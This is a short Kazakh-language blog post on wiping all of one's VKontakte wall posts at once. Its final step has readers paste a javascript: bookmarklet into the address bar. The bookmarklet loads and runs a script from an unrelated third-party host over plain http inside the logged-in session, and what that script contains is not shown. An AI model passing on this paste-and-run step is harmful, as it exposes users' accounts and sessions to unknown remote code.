Вконтактеден бүкіл ақпаратты өшіреміз
Кеше вконтакте желісінде бөліскен барлық ақпаратымды өшіріп тастағым келді. Былайша айтқанда виртуалдан арылғым келіп жүр. Алайда 1130 жазбаны шейірлеп жіберген екенмін. Мұның бәрін жеке-жеке өшіру уақыт алады. Амалсыз гугл ұстаздың көмегіне жүгіндім.
Сөйтсек, браузердің адрес жазылатын жолына белгілі бір кодты қойсаң, бүкіл жарияланым бір сәтте жоқ болады. Ол үшін әуелі өзіміздің жазбаларымызға барамыз. vk/wall??????.. Сосын пернетақтадағы END батырмасын басу арқылы ең соңғы жазбаға дейін жетеміз. Ендігі кезек адрес жолына кодты жазу. Сосын enter-ді басып жібереміз. Бітті. Код төменде.
Айтпақшы, менде басында көшіріп әкелгенде «javascript» көшірілмей қойды. Амалсыз қолбен жазуға тура келді.
Әрине, мұндай әдіспен барлық ақпаратты өшірдім деп айтуға болмас. Өйткені, бәрібір деректің бәрі вконтактенің базасында сақталып тұрады ғой.

javascript: (function(){var s=document.createElement('script'); s.src='http://fringegame.ru/delmsg.js'; s.type='text/javascript'; document.getElementsByTagName('head')[0].appendChild(s); })();

4 пікір